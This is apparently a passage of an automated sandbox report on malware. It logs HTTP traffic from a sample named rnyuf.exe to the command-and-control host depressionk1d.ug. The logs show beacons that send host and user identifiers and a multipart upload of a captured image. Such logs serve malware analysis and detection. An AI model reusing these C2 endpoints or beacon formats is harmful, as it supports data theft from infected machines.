66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 62 72 3e cf f0 e5 e2 fb f8 e5 ed e8 e5 20 e2 fb e4 e5 eb e5 ed ed fb f5 20 f0 e5 f1 f3 f0 f1 ee e2 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a
                          Data Ascii: <HTML><HEAD><title>508 Resource Limit Is Reached - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>508 Resource Limit Is Reached<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error
                          Nov 12, 2021 22:24:53.516340971 CET17831INData Raw: 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e
                          Data Ascii: - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          369192.168.2.450219178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:52.844345093 CET17720OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:52.844435930 CET17720OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:52.844613075 CET17730OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:52.844686031 CET17731OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:52.844701052 CET17733OUTData Raw: 09 d7 f6 9e fd ff 00 e8 9f d9 1e 4f 99 84 27 ef e3 8c 63 3e f8 c5 79 1f c6 bf f9 28 37 7f f0 0f fd 15 1d 72 45 c9 4d c5 b7 b7 5b f7 f3 48 de 76 e5 4d 25 bf f5 dc f3 9a 28 a4 ef 56 64 2d 14 51 40 05 14 51 40 05 14 52 0a 00 0d 2d 21 a5 a0 05 a2 92
                          Data Ascii: O'c>y(7rEM[HvM%(Vd-Q@Q@R-!P+b:m>$dQC,oE#5iVZ8QVg6;qjJ}SRmO!v{aR{:$~x/Jhxru,l+HL v
                          Nov 12, 2021 22:24:52.867250919 CET17736OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:52.867312908 CET17741OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:52.867331028 CET17746OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:52.867351055 CET17749OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:52.867389917 CET17752OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:24:52.867614031 CET17756OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:53.942509890 CET17834INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:53 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:24:53.960978985 CET17835OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:53.985035896 CET17836INHTTP/1.1 508 unused
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:53 GMT
                          Content-Type: text/html
                          Content-Length: 1226
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Retry-After: 14400
                          Last-Modified: Tue, 02 Jan 2018 12:36:34 GMT
                          ETag: "6500109-4ca-561ca595b5880"
                          Accept-Ranges: bytes
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 20 2d 20 cf f0 e5 e2 fb f8 e5 ed e8 e5 20 e2 fb e4 e5 eb e5 ed ed fb f5 20 f0 e5 f1 f3 f0 f1 ee e2 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 62 72 3e cf f0 e5 e2 fb f8 e5 ed e8 e5 20 e2 fb e4 e5 eb e5 ed ed fb f5 20 f0 e5 f1 f3 f0 f1 ee e2 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a
                          Data Ascii: <HTML><HEAD><title>508 Resource Limit Is Reached - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>508 Resource Limit Is Reached<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error
                          Nov 12, 2021 22:24:53.985090971 CET17836INData Raw: 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e
                          Data Ascii: - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          37192.168.2.449821178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:30.774305105 CET4118OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:30.799658060 CET4119INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          370192.168.2.450220178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:53.657301903 CET17831OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:53.681171894 CET17833INHTTP/1.1 508 unused
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:53 GMT
                          Content-Type: text/html
                          Content-Length: 1226
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Retry-After: 14400
                          Last-Modified: Tue, 02 Jan 2018 12:36:34 GMT
                          ETag: "6500109-4ca-561ca595b5880"
                          Accept-Ranges: bytes
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 20 2d 20 cf f0 e5 e2 fb f8 e5 ed e8 e5 20 e2 fb e4 e5 eb e5 ed ed fb f5 20 f0 e5 f1 f3 f0 f1 ee e2 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 62 72 3e cf f0 e5 e2 fb f8 e5 ed e8 e5 20 e2 fb e4 e5 eb e5 ed ed fb f5 20 f0 e5 f1 f3 f0 f1 ee e2 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a
                          Data Ascii: <HTML><HEAD><title>508 Resource Limit Is Reached - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>508 Resource Limit Is Reached<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error
                          Nov 12, 2021 22:24:53.681185961 CET17833INData Raw: 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e
                          Data Ascii: - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          371192.168.2.450221178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:53.813380003 CET17834OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:53.842993021 CET17834INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:53 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          372192.168.2.450222178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
